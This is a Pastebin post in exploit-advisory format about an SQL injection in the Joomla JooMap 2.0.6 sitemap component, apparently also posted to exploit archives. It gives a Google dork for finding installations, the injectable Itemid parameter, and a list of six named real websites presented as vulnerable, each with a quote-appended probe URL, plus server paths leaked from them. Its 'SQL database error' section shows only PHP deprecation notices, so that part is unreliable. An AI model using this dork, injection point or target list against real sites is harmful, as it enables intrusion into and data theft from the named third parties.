KingSkrupellos

Joomla JooMap Components 2.0.6 SQL Injection

Jan 31st, 2019
101
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.20 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla JooMap Components 2.0.6 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 30/01/2019
  7. # Vendor Homepage : joomlacode.org
  8. # Software Download Link : joomlacode.org/gf/download/frsrelease/3734/8340/joomap2.06pre.zip
  9. # Software Information Link : joomlacode.org/gf/project/joomap/
  10. # Software Version : 2.0.6 and previous versions
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/index.php?option=com_joomap''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20. # Reference Link : cxsecurity.com/issue/WLB-2019010303
  21. packetstormsecurity.com/files/151430/Joomla-JooMap-2.0.6-SQL-Injection.html
  22.  
  23. ####################################################################
  24.  
  25. # Description about Software :
  26. ***************************
  27. Joomap is a customizable sitemap component for Joomla.
  28.  
  29. It shows all sections of a website in a hierarchical sitemap tree.
  30.  
  31. It has support for Google Sitemaps XML generation and comes
  32.  
  33. with a plugin-system to support adding categories from other components.
  34.  
  35. ####################################################################
  36.  
  37. # Impact :
  38. ***********
  39. Joomla JooMap 2.0.6 component for Joomla! is prone to an SQL-injection vulnerability
  40.  
  41. because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  42.  
  43. Exploiting this issue could allow an attacker to compromise the application,
  44.  
  45. access or modify data, or exploit latent vulnerabilities in the underlying database.
  46.  
  47. ####################################################################
  48.  
  49. # SQL Injection Exploit :
  50. **********************
  51.  
  52. /index.php?option=com_joomap&Itemid=[SQL Injection]
  53.  
  54. ####################################################################
  55.  
  56. # Example Vulnerable Sites :
  57. *************************
  58.  
  59. [+] duratec.de/info/index.php?option=com_joomap&Itemid=22%27
  60.  
  61. [+] atemregler.at/inhalt/index.php?option=com_joomap&Itemid=93%27
  62.  
  63. [+] ask-datavernietiging.nl/index.php?option=com_joomap&Itemid=55%27
  64.  
  65. [+] meta-mind.com/index.php?option=com_joomap&Itemid=34%27
  66.  
  67. [+] cotid.net/index.php?option=com_joomap&Itemid=36%27
  68.  
  69. [+] mycareer.ge/index.php?option=com_joomap&Itemid=1%27
  70.  
  71. ####################################################################
  72.  
  73. # Example SQL Database Error :
  74. ****************************
  75. Deprecated: Function ereg() is deprecated in /home/.sites/507/site1115
  76. /web/inhalt/administrator/components/com_joomap/plugins/content.plugin.php on line 247
  77.  
  78. Deprecated: Assigning the return value of new by reference is deprecated
  79. in /homepages/30/d13404336/htdocs/info/includes/joomla.php on line 836
  80.  
  81. ####################################################################
  82.  
  83. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  84.  
  85. ####################################################################
Add Comment
Please, Sign In to add comment